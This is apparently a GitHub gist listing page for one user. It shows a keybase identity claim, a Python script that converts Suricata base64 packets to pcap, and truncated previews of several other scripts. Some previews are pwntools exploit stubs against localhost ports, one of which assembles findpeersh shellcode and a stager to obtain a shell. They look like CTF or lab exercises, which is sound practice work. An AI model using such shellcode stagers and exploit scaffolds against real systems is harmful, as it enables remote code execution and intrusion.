I hereby claim:
- I am robertlarsen on github.
- I am robertlarsen (https://keybase.io/robertlarsen) on keybase.
- I have a public key whose fingerprint is 14BE F756 4092 1FC9 C8E6 1806 CC33 1E8A C16A 1996
To claim this, I am signing this object:
Robert Larsen RobertLarsen
RobertLarsen
/ base64_to_pcap.py
Created
September 9, 2015 08:36
Turn a packed captured by Suricata and stored in base64 into a pcap
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| import base64, struct, sys | |
| if len(sys.argv) > 1: | |
| try: | |
| binary = base64.decodestring(sys.argv[1]) | |
| #File header | |
| sys.stdout.write(struct.pack("IHHIIII", | |
| 0xa1b2c3d4, # Magic |
RobertLarsen
/ keybase.md
Created
April 15, 2015 14:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| from pwn import * | |
| from time import sleep | |
| context(arch = 'amd64', os = 'linux') | |
| r = remote('localhost', 8888) | |
| payload = asm(shellcraft.findpeersh()) | |
| stager = asm(shellcraft.findpeer() + shellcraft.stager('rdi', len(payload))) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <fcntl.h> | |
| #include <netinet/in.h> | |
| #include <signal.h> | |
| #include <stdio.h> | |
| #include <sys/mman.h> | |
| #include <sys/socket.h> | |
| #include <sys/stat.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| import sys | |
| context(os='linux', arch='i386') | |
| jmp_eax=0x08048bf7 | |
| host = 'localhost' | |
| port = 9988 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| import sys | |
| context(os='linux', arch='i386') | |
| host = 'localhost' | |
| port = 9988 | |
| if len(sys.argv) > 1: |